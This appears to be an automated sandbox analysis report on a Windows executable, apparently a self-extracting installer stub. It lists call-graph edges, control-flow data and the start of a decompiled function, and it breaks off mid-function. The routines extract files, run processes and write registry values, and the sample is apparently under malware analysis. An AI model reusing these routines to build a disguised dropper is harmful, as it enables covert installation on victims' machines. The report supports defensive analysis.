405b4a 2803->2815 2806 404495 20 API calls 2804->2806 2807 405a3f GetLastError FormatMessageA 2805->2807 2808 405bab SetCurrentDirectoryA 2806->2808 2807->2804 2808->2815 2809 406c80 4 API calls 2811 405bc7 2809->2811 2812 405ac0 2810->2812 2814 405ad6 2810->2814 2811->2617 2813 404495 20 API calls 2812->2813 2813->2803 2814->2815 2840 40268a 2814->2840 2815->2809 2819 40537d 2817->2819 2818 40173e _vsnprintf 2818->2819 2819->2818 2820 406534 CharPrevA 2819->2820 2823 4053d3 GetTempFileNameA 2819->2823 2821 4053b8 RemoveDirectoryA GetFileAttributesA 2820->2821 2821->2819 2822 40540b CreateDirectoryA 2821->2822 2822->2823 2824 4053f8 2822->2824 2823->2824 2825 4053e7 DeleteFileA CreateDirectoryA 2823->2825 2826 406c80 4 API calls 2824->2826 2825->2824 2827 405407 2826->2827 2827->2763 2829 405890 2828->2829 2829->2829 2830 405897 LocalAlloc 2829->2830 2831 4058ab 2830->2831 2832 4058cf 2830->2832 2833 404495 20 API calls 2831->2833 2836 406534 CharPrevA 2832->2836 2834 4058be 2833->2834 2835 406233 GetLastError 2834->2835 2838 4054f0 2834->2838 2835->2838 2837 4058e7 CreateFileA LocalFree 2836->2837 2837->2834 2839 405911 CloseHandle GetFileAttributesA 2837->2839 2838->2765 2838->2766 2839->2834 2841 4026e4 2840->2841 2842 4026b8 2840->2842 2844 4026e9 2841->2844 2845 40271e 2841->2845 2843 40173e _vsnprintf 2842->2843 2846 4026cb 2843->2846 2847 40173e _vsnprintf 2844->2847 2848 4026e2 2845->2848 2849 40173e _vsnprintf 2845->2849 2850 404495 20 API calls 2846->2850 2852 4026fc 2847->2852 2851 406c80 4 API calls 2848->2851 2853 402734 2849->2853 2850->2848 2854 40276c 2851->2854 2855 404495 20 API calls 2852->2855 2856 404495 20 API calls 2853->2856 2854->2815 2855->2848 2856->2848 2858 404669 7 API calls 2857->2858 2859 404fb5 FindResourceA LoadResource LockResource 2858->2859 2860 404fe0 2859->2860 2876 40511f 2859->2876 2861 405017 2860->2861 2862 404fe9 GetDlgItem ShowWindow GetDlgItem ShowWindow 2860->2862 2879 404ecb 2861->2879 2862->2861 2865 405020 2867 404495 20 API calls 2865->2867 2866 40503c 2869 4050a8 2866->2869 2873 4050c6 2866->2873 2868 405035 2867->2868 2868->2873 2870 404495 20 API calls 2869->2870 2870->2868 2871 4050d0 FreeResource 2872 4050dd 2871->2872 2874 4050e9 2872->2874 2875 4050fa 2872->2875 2873->2871 2873->2872 2877 404495 20 API calls 2874->2877 2875->2876 2878 40510c SendMessageA 2875->2878 2876->2659 2877->2875 2878->2876 2880 404f18 2879->2880 2881 404f6f 2880->2881 2887 404950 2880->2887 2883 406c80 4 API calls 2881->2883 2884 404f94 2883->2884 2884->2865 2884->2866 2888 404960 2887->2888 2889 404992 lstrcmpA 2888->2889 2890 404975 2888->2890 2891 4049de 2889->2891 2893 40498a 2889->2893 2892 404495 20 API calls 2890->2892 2891->2893 2898 404854 2891->2898 2892->2893 2893->2881 2895 404b30 2893->2895 2896 404b62 FindCloseChangeNotification 2895->2896 2897 404b46 2895->2897 2896->2897 2897->2881 2899 40487c CreateFileA 2898->2899 2901 4048e2 2899->2901 2902 4048c3 2899->2902 2901->2893 2902->2901 2903 4048c8 2902->2903 2906 4048e6 2903->2906 2907 4048cf CreateFileA 2906->2907 2909 4048f1 2906->2909 2907->2901 2908 40493c CharNextA 2908->2909 2909->2907 2909->2908 2910 40492d CreateDirectoryA 2909->2910 2910->2908 2912 402560 2911->2912 2913 402515 2911->2913 2915 406c80 4 API calls 2912->2915 2914 406534 CharPrevA 2913->2914 2916 402527 WritePrivateProfileStringA _lopen 2914->2916 2917 40256e 2915->2917 2916->2912 2918 40254d _llseek _lclose 2916->2918 2917->2668 2918->2912 2920 401b41 2919->2920 3024 401aa2 2920->3024 2922 401b73 2923 406534 CharPrevA 2922->2923 2925 401ba8 2922->2925 2923->2925 2924 406670 2 API calls 2926 401bed 2924->2926 2925->2924 2927 401bf5 CompareStringA 2926->2927 2928 401d8f 2926->2928 2927->2928 2929 401c13 GetFileAttributesA 2927->2929 2930 406670 2 API calls 2928->2930 2931 401c29 2929->2931 2932 401d6f 2929->2932 2933 401d99 2930->2933 2931->2932 2938 401aa2 2 API calls 2931->2938 2936 404495 20 API calls 2932->2936 2934 401e14 LocalAlloc 2933->2934 2935 401d9d CompareStringA 2933->2935 2934->2932 2937 401e27 GetFileAttributesA 2934->2937 2935->2934 2943 401db7 2935->2943 2956 401cde 2936->2956 2939 401e39 2937->2939 2957 401e61 2937->2957 2940 401c4d 2938->2940 2939->2957 2941 401c6c LocalAlloc 2940->2941 2946 401aa2 2 API calls 2940->2946 2941->2932 2944 401c83 GetPrivateProfileIntA GetPrivateProfileStringA 2941->2944 2942 401ea5 2945 406c80 4 API calls 2942->2945 2943->2943 2947 401dda LocalAlloc 2943->2947 2952 401d14 2944->2952 2944->2956 2950 401ebd 2945->2950 2946->2941 2947->2932 2951 401dfd 2947->2951 2950->2689 2955 40173e _vsnprintf 2951->2955 2953 401d25 GetShortPathNameA 2952->2953 2954 401d3f 2952->2954 2953->2954 2958 40173e _vsnprintf 2954->2958 2955->2956 2956->2942 3030 402aa5 2957->3030 2958->2956 2960 40225f 2959->2960 2961 4020a3 2959->2961 2962 406c80 4 API calls 2960->2962 2964 40173e _vsnprintf 2961->2964 2966 4020e5 2961->2966 2963 40226c 2962->2963 2963->2689 2965 4020b8 RegQueryValueExA 2964->2965 2965->2961 2965->2966 2967 402104 GetSystemDirectoryA 2966->2967 2968 4020ed RegCloseKey 2966->2968 2969 406534 CharPrevA 2967->2969 2968->2960 2970 402124 LoadLibraryA 2969->2970 2971 402182 GetModuleFileNameA 2970->2971 2972 402137 GetProcAddress FreeLibrary 2970->2972 2973 4021e7 RegCloseKey 2971->2973 2977 402180 2971->2977 2972->2971 2974 402157 GetSystemDirectoryA 2972->2974 2973->2960 2975 40216e 2974->2975 2974->2977 2976 406534 CharPrevA 2975->2976 2976->2977 2977->2977 2978 4021c0 LocalAlloc 2977->2978 2979 4021d6 2978->2979 2981 4021f5 2978->2981 2980 404495 20 API calls 2979->2980 2980->2973 2982 40173e _vsnprintf 2981->2982 2983 402221 RegSetValueExA RegCloseKey LocalFree 2982->2983 2983->2960 2986 404002 CreateProcessA 2985->2986 2998 4040f2 2985->2998 2987 4040b0 2986->2987 2988 40402d WaitForSingleObject GetExitCodeProcess 2986->2988 2990 406233 GetLastError 2987->2990 2991 40405c 2988->2991 2992 404077 2988->2992 2989 406c80 4 API calls 2993 404103 2989->2993 2995 4040b5 GetLastError FormatMessageA 2990->2995 2991->2992 3057 404105 2992->3057 2993->2689 2997 404495 20 API calls 2995->2997 2997->2998 2998->2989 2999 4040a6 2999->2998 3001 406470 3000->3001 3002 406534 CharPrevA 3001->3002 3003 406486 GetFileAttributesA 3002->3003 3004 406498 3003->3004 3005 4064af LoadLibraryA 3003->3005 3004->3005 3006 40649c LoadLibraryExA 3004->3006 3007 4064b6 3005->3007 3006->3007 3008 406c80 4 API calls 3007->3008 3009 4064c1 3008->3009 3009->2707 3011 402290 RegOpenKeyExA 3010->3011 3012 402388 3010->3012 3011->3012 3013 4022b8 RegQueryValueExA 3011->3013 3014 406c80 4 API calls 3012->3014 3016 40237b RegCloseKey 3013->3016 3017 4022ed memset GetSystemDirectoryA 3013->3017 3015 402393 3014->3015 3015->2681 3016->3012 3018 402316 3017->3018 3019 402328 3017->3019 3020 406534 CharPrevA 3018->3020 3021 40173e _vsnprintf 3019->3021 3020->3019 3022 402346 RegSetValueExA 3021->3022 3022->3016 3025 401ab8 3024->3025 3027 401ad8 3025->3027 3029 401acd 3025->3029 3043 406627 3025->3043 3027->2922 3028 406627 2 API calls 3028->3029 3029->3027 3029->3028 3031 402bdf 3030->3031 3032 402acd GetModuleFileNameA 3030->3032 3033 406c80 4 API calls 3031->3033 3042 402afb 3032->3042 3035 402bee 3033->3035 3034 402aea IsDBCSLeadByte 3034->3042 3035->2942 3036 402bc3 CharNextA 3038 402bcc CharNextA 3036->3038 3037 402b0a CharNextA CharUpperA 3039 402b86 CharUpperA 3037->3039 3037->3042 3038->3042 3039->3042 3041 402b3c CharPrevA 3041->3042 3042->3031 3042->3034 3042->3036 3042->3037 3042->3038 3042->3041 3048 406592 3042->3048 3044 406631 3043->3044 3045 40664d 3044->3045 3046 4065f2 IsDBCSLeadByte 3044->3046 3047 40663f CharNextA 3044->3047 3045->3025 3046->3044 3047->3044 3049 40659e 3048->3049 3049->3049 3050 4065a5 CharPrevA 3049->3050 3051 4065bb CharPrevA 3050->3051 3052 4065b5 3051->3052 3053 4065c8 3051->3053 3052->3051 3052->3053 3054 4065e7 3053->3054 3055 4065d1 CharPrevA 3053->3055 3056 4065de CharNextA 3053->3056 3054->3042 3055->3054 3055->3056 3056->3054 3058 40411c 3057->3058 3060 404082 CloseHandle CloseHandle 3057->3060 3061 401ec1 3058->3061 3060->2998 3060->2999 3062 401ed0 3061->3062 3063 401ee3 3061->3063 3064 402570 15 API calls 3062->3064 3063->3060 3064->3063 3066 402031 3065->3066 3067 401ffb RegOpenKeyExA 3065->3067 3066->2323 3067->3066 3068 40201a RegDeleteValueA RegCloseKey 3067->3068 3068->3066 3168 403440 3169 4034c3 EndDialog 3168->3169 3170 40344e 3168->3170 3172 40345a 3169->3172 3171 40348a GetDesktopWindow 3170->3171 3176 403455 3170->3176 3173 4043ae 11 API calls 3171->3173 3174 40349c SetWindowTextA SetDlgItemTextA SetForegroundWindow 3173->3174 3174->3172 3175 40347c EndDialog 3175->3172 3176->3172 3176->3175 3177 401a00 3178 401a23 3177->3178 3179 401a44 GetDesktopWindow 3177->3179 3182 401a36 EndDialog 3178->3182 3183 401a40 3178->3183 3180 4043ae 11 API calls 3179->3180 3181 401a53 LoadStringA SetDlgItemTextA MessageBeep 3180->3181 3181->3183 3182->3183 3184 406c80 4 API calls 3183->3184 3185 401a9e 3184->3185 3186 403200 3187 403217 3186->3187 3210 40327e EndDialog 3186->3210 3188 4033d2 GetDesktopWindow 3187->3188 3189 403225 3187->3189 3191 4043ae 11 API calls 3188->3191 3192 403229 3189->3192 3194 40323c 3189->3194 3195 4032cd GetDlgItemTextA 3189->3195 3193 4033e1 SetWindowTextA SendDlgItemMessageA 3191->3193 3193->3192 3196 40340f GetDlgItem EnableWindow 3193->3196 3198 403241 3194->3198 3199 4032b5 EndDialog 3194->3199 3197 4032ec 3195->3197 3218 403356 3195->3218 3196->3192 3207 403321 GetFileAttributesA 3197->3207 3197->3218 3198->3192 3200 40324c LoadStringA 3198->3200 3199->3192 3201 403284 3200->3201 3203 40326b 3200->3203 3224 404204 LoadLibraryA 3201->3224 3202 404495 20 API calls 3202->3192 3205 404495 20 API calls 3203->3205 3205->3210 3208 40336c 3207->3208 3209 40332f 3207->3209 3213 406534 CharPrevA 3208->3213 3212 404495 20 API calls 3209->3212 3210->3192 3211 403295 SetDlgItemTextA 3211->3192 3211->3203 3214 403341 3212->3214 3215 40337d 3213->3215 3214->3192 3216 40334a CreateDirectoryA 3214->3216 3217 405880 27 API calls 3215->3217 3216->3208 3216->3218 3219 403384 3217->3219 3218->3202 3219->3218 3220 403394 3219->3220 3221 4033b7 EndDialog 3220->3221 3222 405933 34 API calls 3220->3222 3221->3192 3223 4033b3 3222->3223 3223->3192 3223->3221 3225 404392 3224->3225 3226 404226 GetProcAddress 3224->3226 3229 404495 20 API calls 3225->3229 3227 404384 FreeLibrary 3226->3227 3228 40423d GetProcAddress 3226->3228 3227->3225 3228->3227 3230 404254 GetProcAddress 3228->3230 3232 40328d 3229->3232 3230->3227 3231 40426b 3230->3231 3233 404275 GetTempPathA 3231->3233 3238 4042c1 3231->3238 3232->3192 3232->3211 3234 40428d 3233->3234 3234->3234 3235 404294 CharPrevA 3234->3235 3236 4042b0 CharPrevA 3235->3236 3235->3238 3236->3238 3237 404370 FreeLibrary 3237->3232 3238->3237 3164 401ec1 3165 401ed0 3164->3165 3166 401ee3 3164->3166 3167 402570 15 API calls 3165->3167 3167->3166 3254 406b8f _XcptFilter 3069 404c90 GlobalFree 3255 406950 3256 406955 3255->3256 3264 406f68 GetModuleHandleW 3256->3264 3258 406961 __set_app_type __p__fmode __p__commode 3259 406999 3258->3259 3260 4069a2 __setusermatherr 3259->3260 3261 4069ae 3259->3261 3260->3261 3266 40719d _controlfp 3261->3266 3263 4069b3 3265 406f79 3264->3265 3265->3258 3266->3263 3267 404b90 3269 404ba7 3267->3269 3270 404bd5 3267->3270 3268 404beb SetFilePointer 3268->3269 3270->3268 3270->3269 3271 406e90 3272 406ecd 3271->3272 3274 406ea2 3271->3274 3273 406ec7 ?terminate@ 3273->3272 3274->3272 3274->3273 3070 4034e0 3071 4034f4 3070->3071 3072 40364b 3070->3072 3071->3072 3073 40350b 3071->3073 3074 4035ae GetDesktopWindow 3071->3074 3078 403661 EndDialog 3072->3078 3080 403516 3072->3080 3076 40353f 3073->3076 3077 40350f 3073->3077 3094 4043ae 6 API calls 3074->3094 3076->3080 3082 403549 ResetEvent 3076->3082 3077->3080 3081 40351d TerminateThread KiUserCallbackDispatcher 3077->3081 3078->3080 3081->3080 3085 404495 20 API calls 3082->3085 3083 4035d0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3084 40360d SetWindowTextA CreateThread 3083->3084 3084->3080 3086 403636 3084->3086 3106 404fa0 42 API calls 3084->3106 3087 403571 3085->3087 3088 404495 20 API calls 3086->3088 3089 40358b SetEvent 3087->3089 3091 40357a SetEvent 3087->3091 3090 403647 3088->3090 3099 403670 3089->3099 3090->3078 3091->3080 3095 404441 SetWindowPos 3094->3095 3097 406c80 4 API calls 3095->3097 3098 4035c6 3097->3098 3098->3083 3098->3084 3100 403681 MsgWaitForMultipleObjects 3099->3100 3101 4035a8 3100->3101 3102 403699 PeekMessageA 3100->3102 3101->3072 3102->3100 3103 4036ac 3102->3103 3103->3100 3103->3101 3104 4036b7 DispatchMessageA 3103->3104 3105 4036c1 PeekMessageA 3103->3105 3104->3105 3105->3103 3107 404ca0 3108 404cc4 3107->3108 3109 404cdb 3107->3109 3110 404cd2 3108->3110 3111 404b30 FindCloseChangeNotification 3108->3111 3109->3110 3113 404cf5 3109->3113 3114 404d9b 3109->3114 3112 406c80 4 API calls 3110->3112 3111->3110 3115 404e65 3112->3115 3113->3110 3130 404c07 3113->3130 3116 404da4 SetDlgItemTextA 3114->3116 3117 404db3 3114->3117 3116->3117 3117->3110 3135 404747 3117->3135 3121 404e08 3121->3110 3123 404950 25 API calls 3121->3123 3122 404b30 FindCloseChangeNotification 3124 404d69 SetFileAttributesA 3122->3124 3125 404e26 3123->3125 3124->3110 3125->3110 3126 404e34 3125->3126 3144 4047ba LocalAlloc 3126->3144 3129 404e3f 3129->3110 3131 404c1c DosDateTimeToFileTime 3130->3131 3133 404c58 3130->3133 3132 404c2e LocalFileTimeToFileTime 3131->3132 3131->3133 3132->3133 3134 404c40 SetFileTime 3132->3134 3133->3110 3133->3122 3134->3133 3153 406656 GetFileAttributesA 3135->3153 3137 404755 3137->3121 3138 4047a6 SetFileAttributesA 3139 4047b5 3138->3139 3139->3121 3141 4064c3 24 API calls 3142 40478b 3141->3142 3142->3138 3142->3139 3143 40479c 3142->3143 3143->3138 3145 4047d0 3144->3145 3146 4047e9 LocalAlloc 3144->3146 3147 404495 20 API calls 3145->3147 3149 40480b 3146->3149 3152 4047e5 3146->3152 3147->3152 3150 404495 20 API calls 3149->3150 3151 404820 LocalFree 3150->3151 3151->3152 3152->3129 3154 404751 3153->3154 3154->3137 3154->3138 3154->3141 3155 404aa0 3156 403670 4 API calls 3155->3156 3157 404ab0 3156->3157 3158 404ab9 3157->3158 3159 404abe WriteFile 3157->3159 3160 404ae4 3159->3160 3161 404adf 3159->3161 3160->3161 3162 404b0b SendDlgItemMessageA 3160->3162 3162->3161 3239 404a20 3240 404a6f ReadFile 3239->3240 3242 404a36 3239->3242 3241 404a8b 3240->3241 3242->3241 3243 404a52 memcpy 3242->3243 3243->3241 3244 407220 _except_handler4_common 3245 4041e0 3246 4041eb SendMessageA 3245->3246 3247 4041fe 3245->3247 3246->3247 3248 406ee0 SetUnhandledExceptionFilter 3249 406ba3 3250 406bb7 _exit 3249->3250 3251 406bbe 3249->3251 3250->3251 3252 406bd2 3251->3252 3253 406bc7 _cexit 3251->3253 3253->3252 3163 404c70 GlobalAlloc 3275 406370 3276 4063b7 3275->3276 3277 406534 CharPrevA 3276->3277 3278 4063c5 CreateFileA 3277->3278 3279 4063f8 WriteFile 3278->3279 3280 4063ea 3278->3280 3281 406415 CloseHandle 3279->3281 3283 406c80 4 API calls 3280->3283 3281->3280 3284 40643f 3283->3284 3285 4030f0 3286 4031a0 3285->3286 3287 403101 3285->3287 3288 4031a9 SendDlgItemMessageA 3286->3288 3289 403131 3286->3289 3290 403139 GetDesktopWindow 3287->3290 3294 40310d 3287->3294 3288->3289 3292 4043ae 11 API calls 3290->3292 3291 403128 EndDialog 3291->3289 3293 40314d 6 API calls 3292->3293 3293->3289 3294->3289 3294->3291 3295 4030b0 3296 4030ce CallWindowProcA 3295->3296 3297 4030be 3295->3297 3298 4030ca 3296->3298 3297->3296 3297->3298

                                                                                                                                                                                                                                      Callgraph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      • Opacity -> Relevance
                                                                                                                                                                                                                                      • Disassembly available
                                                                                                                                                                                                                                      callgraph 0 Function_00403440 115 Function_004043AE 0->115 1 Function_00406F41 2 Function_00406743 3 Function_00406443 55 Function_00406534 3->55 89 Function_00406C80 3->89 109 Function_004017A1 3->109 4 Function_00406F45 5 Function_00406246 56 Function_0040173E 5->56 5->89 6 Function_00404747 13 Function_00406656 6->13 61 Function_004064C3 6->61 7 Function_00406950 17 Function_00406F68 7->17 42 Function_00406C1A 7->42 103 Function_0040719D 7->103 118 Function_00406FB0 7->118 8 Function_00405C50 21 Function_00406670 8->21 47 Function_00406627 8->47 8->55 62 Function_00406DC8 8->62 64 Function_00405BCB 8->64 67 Function_004031D0 8->67 8->89 100 Function_00404495 8->100 107 Function_004016A0 8->107 9 Function_00404950 12 Function_00404854 9->12 9->100 10 Function_00407252 11 Function_00404153 18 Function_00404669 11->18 11->100 78 Function_004048E6 12->78 14 Function_0040555A 14->18 45 Function_00405423 14->45 51 Function_00402631 14->51 52 Function_00405933 14->52 54 Function_00406233 14->54 14->55 14->61 86 Function_004068FC 14->86 14->89 14->100 14->109 15 Function_0040535F 15->55 15->56 15->89 15->107 16 Function_00404E67 16->107 85 Function_00406EF4 17->85 19 Function_0040226E 19->55 19->56 19->89 20 Function_00406370 20->55 20->89 20->109 84 Function_004065F2 21->84 22 Function_00402770 22->55 22->89 22->107 22->109 23 Function_00403670 24 Function_00404C70 25 Function_00402570 77 Function_004024E5 25->77 26 Function_00405276 81 Function_00401FEC 26->81 26->89 98 Function_00406592 26->98 99 Function_00402395 26->99 26->109 27 Function_00406777 27->2 28 Function_0040167F 28->109 29 Function_00406A00 34 Function_00407105 29->34 40 Function_00407010 29->40 80 Function_00406BE9 29->80 83 Function_00402BF2 29->83 119 Function_004071B8 29->119 30 Function_00401A00 30->89 30->115 31 Function_00403200 33 Function_00404204 31->33 31->52 31->55 88 Function_00405880 31->88 31->100 31->115 32 Function_00401B04 32->21 32->55 32->56 69 Function_004016D3 32->69 32->89 32->100 32->107 32->109 111 Function_00401AA2 32->111 114 Function_00402AA5 32->114 33->100 33->107 35 Function_00404105 59 Function_00401EC1 35->59 36 Function_00404C07 37 Function_0040180E 37->89 38 Function_00402F10 38->11 38->14 38->25 41 Function_00403B12 38->41 46 Function_00405124 38->46 48 Function_00403A2B 38->48 38->54 38->55 66 Function_004061CE 38->66 38->89 92 Function_00403B8E 38->92 38->100 113 Function_004051A5 38->113 39 Function_00406710 58 Function_00406FC0 40->58 68 Function_004070D0 40->68 41->5 41->61 106 Function_00404FA0 41->106 43 Function_00404A20 44 Function_00407220 45->15 45->52 45->54 45->55 45->88 45->89 45->107 45->109 46->5 46->18 46->100 47->84 48->18 48->54 48->61 48->100 49 Function_00404B30 50 Function_00406330 51->89 51->100 52->54 52->89 91 Function_0040268A 52->91 52->100 53 Function_00402033 53->55 53->56 53->89 53->100 55->69 57 Function_004069C0 59->25 60 Function_004018C1 60->37 60->89 61->100 95 Function_00406C90 62->95 63 Function_004067CB 63->89 110 Function_004066A1 63->110 65 Function_00404ECB 65->9 65->49 65->89 66->52 66->54 66->89 66->100 69->109 70 Function_00403FDB 70->35 70->54 70->89 70->100 71 Function_004036DC 71->27 71->63 76 Function_004028E3 71->76 71->89 90 Function_00402A82 71->90 71->100 72 Function_004046DC 72->69 72->107 73 Function_004034E0 73->23 73->100 73->106 73->115 74 Function_004041E0 75 Function_00406EE0 76->22 76->90 77->55 77->89 79 Function_004017E8 82 Function_004030F0 82->115 83->26 83->38 101 Function_00401F9B 83->101 108 Function_00402CA1 83->108 85->119 87 Function_004071FD 88->54 88->55 88->100 88->107 89->95 91->56 91->89 91->100 92->3 92->18 92->19 92->32 92->53 92->54 92->70 92->89 92->100 92->109 93 Function_00406B8F 94 Function_00404C90 96 Function_00404B90 97 Function_00406E90 99->55 99->69 99->89 99->99 99->107 100->27 100->56 100->63 100->89 100->107 101->59 101->89 101->100 102 Function_0040709B 104 Function_00404CA0 104->6 104->9 104->16 104->36 104->49 104->72 104->89 120 Function_004047BA 104->120 105 Function_00404AA0 105->23 106->18 106->65 106->100 107->109 108->8 108->18 108->60 108->61 108->71 108->89 108->99 108->100 111->47 112 Function_00406BA3 113->18 113->54 113->100 114->79 114->89 114->98 114->107 115->89 116 Function_004070AE 117 Function_004030B0 120->100 120->107

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 36 403b8e-403bc5 37 403bc7-403bda call 404669 36->37 38 403be9-403beb 36->38 45 403be0-403be3 37->45 46 403cff-403d1c call 404495 37->46 40 403bef-403c14 memset 38->40 42 403d21-403d34 call 4017a1 40->42 43 403c1a-403c2c call 404669 40->43 50 403d39-403d3e 42->50 43->46 51 403c32-403c35 43->51 45->38 45->46 58 403f39 46->58 53 403d40-403d58 call 404669 50->53 54 403d8a-403da2 call 401b04 50->54 51->46 56 403c3b-403c42 51->56 53->46 65 403d5a-403d61 53->65 54->58 69 403da8-403dae 54->69 60 403c44-403c4a 56->60 61 403c4c-403c51 56->61 63 403f3b-403f4f call 406c80 58->63 66 403c5a-403c5f 60->66 67 403c61-403c68 61->67 68 403c53-403c59 61->68 71 403fc6-403fcd 65->71 72 403d67-403d84 CompareStringA 65->72 73 403c73-403c75 66->73 67->73 76 403c6a-403c6e 67->76 68->66 74 403db0-403dba 69->74 75 403dd2-403dd4 69->75 77 403fd4-403fd6 71->77 78 403fcf call 40226e 71->78 72->54 72->71 73->50 80 403c7b-403c84 73->80 74->75 79 403dbc-403dc3 74->79 81 403ef7-403f01 call 403fdb 75->81 82 403dda-403de1 75->82 76->73 77->63 78->77 79->75 85 403dc5-403dc7 79->85 86 403c86-403c88 80->86 87 403cdd-403cdf 80->87 92 403f06-403f08 81->92 88 403f97-403fbe call 404495 LocalFree 82->88 89 403de7-403de9 82->89 85->82 93 403dc9-403dcd call 402033 85->93 95 403c91-403c93 86->95 96 403c8a-403c8f 86->96 87->54 91 403ce5-403cfd call 404669 87->91 88->58 89->81 90 403def-403df6 89->90 90->81 97 403dfc-403e05 call 406443 90->97 91->46 91->50 99 403f32-403f33 LocalFree 92->99 100 403f0a-403f19 LocalFree 92->100 93->75 95->58 104 403c99 95->104 103 403c9e-403cb1 call 404669 96->103 113 403e0b-403e22 GetProcAddress 97->113 114 403f7e-403f95 call 404495 97->114 99->58 108 403fc3-403fc5 100->108 109 403f1f-403f27 100->109 103->46 112 403cb3-403cd4 CompareStringA 103->112 104->103 108->71 109->40 112->87 115 403cd6-403cd9 112->115 116 403f50-403f62 call 404495 FreeLibrary 113->116 117 403e28-403e6c 113->117 126 403f68-403f7c LocalFree call 406233 114->126 115->87 116->126 120 403e77-403e80 117->120 121 403e6e-403e73 117->121 124 403e82-403e87 120->124 125 403e8b-403e8e 120->125 121->120 124->125 128 403e90-403e95 125->128 129 403e99-403ea2 125->129 126->58 128->129 131 403ea4-403ea9 129->131 132 403ead-403eaf 129->132 131->132 133 403eb1-403eb6 132->133 134 403eba-403ed8 132->134 133->134 137 403ee1-403ee9 134->137 138 403eda-403edf 134->138 139 403eeb-403ef5 FreeLibrary 137->139 140 403f2c FreeLibrary 137->140 138->137 139->100 140->99
                                                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                                                      			E00403B8E() {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                                                      				char _v280;
                                                                                                                                                                                                                                      				short _v300;
                                                                                                                                                                                                                                      				intOrPtr _v304;
                                                                                                                                                                                                                                      				void _v348;
                                                                                                                                                                                                                                      				char _v352;
                                                                                                                                                                                                                                      				intOrPtr _v356;
                                                                                                                                                                                                                                      				signed int _v360;
                                                                                                                                                                                                                                      				short _v364;
                                                                                                                                                                                                                                      				char* _v368;
                                                                                                                                                                                                                                      				intOrPtr _v372;
                                                                                                                                                                                                                                      				void* _v376;
                                                                                                                                                                                                                                      				intOrPtr _v380;
                                                                                                                                                                                                                                      				char _v384;
                                                                                                                                                                                                                                      				signed int _v388;
                                                                                                                                                                                                                                      				intOrPtr _v392;
                                                                                                                                                                                                                                      				signed int _v396;
                                                                                                                                                                                                                                      				signed int _v400;
                                                                                                                                                                                                                                      				signed int _v404;
                                                                                                                                                                                                                                      				void* _v408;
                                                                                                                                                                                                                                      				void* _v424;
                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                                                                      				signed int _t76;
                                                                                                                                                                                                                                      				void* _t77;
                                                                                                                                                                                                                                      				signed int _t79;
                                                                                                                                                                                                                                      				short _t96;
                                                                                                                                                                                                                                      				signed int _t97;
                                                                                                                                                                                                                                      				intOrPtr _t98;
                                                                                                                                                                                                                                      				signed int _t101;
                                                                                                                                                                                                                                      				signed int _t104;
                                                                                                                                                                                                                                      				signed int _t108;
                                                                                                                                                                                                                                      				int _t112;
                                                                                                                                                                                                                                      				void* _t115;
                                                                                                                                                                                                                                      				signed char _t118;
                                                                                                                                                                                                                                      				void* _t125;
                                                                                                                                                                                                                                      				signed int _t127;
                                                                                                                                                                                                                                      				void* _t128;
                                                                                                                                                                                                                                      				struct HINSTANCE__* _t129;
                                                                                                                                                                                                                                      				void* _t130;
                                                                                                                                                                                                                                      				short _t137;
                                                                                                                                                                                                                                      				char* _t140;
                                                                                                                                                                                                                                      				signed char _t144;
                                                                                                                                                                                                                                      				signed char _t145;
                                                                                                                                                                                                                                      				signed int _t149;
                                                                                                                                                                                                                                      				void* _t150;
                                                                                                                                                                                                                                      				void* _t151;
                                                                                                                                                                                                                                      				signed int _t153;
                                                                                                                                                                                                                                      				void* _t155;
                                                                                                                                                                                                                                      				void* _t156;
                                                                                                                                                                                                                                      				signed int _t157;
                                                                                                                                                                                                                                      				signed int _t162;
                                                                                                                                                                                                                                      				signed int _t164;
                                                                                                                                                                                                                                      				void* _t165;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                                                      				_t69 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                                                      				_t153 = 0;
                                                                                                                                                                                                                                      				 *0x409124 =  *0x409124 & 0;
                                                                                                                                                                                                                                      				_t149 = 0;
                                                                                                                                                                                                                                      				_v388 = 0;
                                                                                                                                                                                                                                      				_v384 = 0;
                                                                                                                                                                                                                                      				_t165 =  *0x408a28 - _t153; // 0x0
                                                                                                                                                                                                                                      				if(_t165 != 0) {
                                                                                                                                                                                                                                      					L3:
                                                                                                                                                                                                                                      					_t127 = 0;
                                                                                                                                                                                                                                      					_v392 = 0;
                                                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                                                      						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                                                      						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                                                      						_t164 = _t164 + 0xc;
                                                                                                                                                                                                                                      						_v348 = 0x44;
                                                                                                                                                                                                                                      						if( *0x408c42 != 0) {
                                                                                                                                                                                                                                      							goto L26;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t146 =  &_v396;
                                                                                                                                                                                                                                      						_t115 = E00404669("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                                                      						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                                                      							L25:
                                                                                                                                                                                                                                      							_t146 = 0x4b1;
                                                                                                                                                                                                                                      							E00404495(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                      							 *0x409124 = 0x80070714;
                                                                                                                                                                                                                                      							goto L62;
                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                      							if(_v396 != 1) {
                                                                                                                                                                                                                                      								__eflags = _v396 - 2;
                                                                                                                                                                                                                                      								if(_v396 != 2) {
                                                                                                                                                                                                                                      									_t137 = 3;
                                                                                                                                                                                                                                      									__eflags = _v396 - _t137;
                                                                                                                                                                                                                                      									if(_v396 == _t137) {
